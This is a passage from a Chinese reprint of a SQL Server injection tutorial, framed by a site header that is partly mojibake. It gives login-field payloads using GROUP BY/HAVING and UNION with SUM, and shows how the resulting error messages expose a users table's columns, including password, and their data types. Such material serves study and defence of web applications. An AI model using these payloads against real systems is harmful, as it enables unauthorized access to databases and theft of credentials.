SQL Server应用程序的高级Sql注入

　2009-04-04 13:56:50　来源：WEB开发网　闂傚倷绶氬ḿ褍螞閹绢喖绠柨鐕傛嫹

闂傚倷绀侀幉锟犲垂閻㈠灚宕查柟鎵閸庡秵銇勯幒鎴濃偓鐢稿磻閹炬枼妲堟繛鍡楃С濞岊亞绱撻崒姘扁枌闁瑰嚖鎷�

婵犵數濮幏鍐川椤撴繄鎹曢梻渚€娼уú銈吤洪妸鈺佺劦妞ゆ帊鑳堕埊鏇㈡煏閸モ晛浠х紒杈╁仱閺佹捇鏁撻敓锟�闂傚倷绶氬ḿ褍螞閹绢喖绠柨鐕傛嫹　　闂傚倷鑳舵灙缂佺粯顨呴埢宥夊即閵忕姵鐎梺缁樺姇閻忔氨鈧凹鍓熷娲垂椤曞懎鍓伴梺閫炲苯澧紒澶婄秺瀵濡歌閸嬫捇妫冨☉娆忔殘闂佷紮缍€娴滎剟鍩€椤掑倹鏆柛瀣躬瀹曚即寮借閺嗭箓鏌ㄩ悤鍌涘

核心提示： username: ' group by users.id having 1=1 --(结果产生这样的错误)Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQ

username: ' group by users.id having 1=1 --

(结果产生这样的错误)

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35

最后攻击者得到了下面的'username'：

' group by users.id, users.username, users.password, users.privs having 1=1--

这句没有错误，相当于：

select * from users where username = ''

所以攻击者知道了查询只是关于'users'表的，并且顺序使用了列'id,username,password,rpivs'。

如果攻击者能确定各列的数据类型将会很有用，可以利用类型转换错误信息来达到这一点，看下面的例子：

Username: ' union select sum(username) from users--

这利用了SQL-Server试图在确定两行是否相同之前先执行'sum'子句的特性，计算文本域的和会返回这样的信息：

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. /process_login.asp, line 35

它告诉我们'username'字段的类型是'varchar'。相反的，如果我们试图计算数值型的字段，但结果两行的列数并不匹配：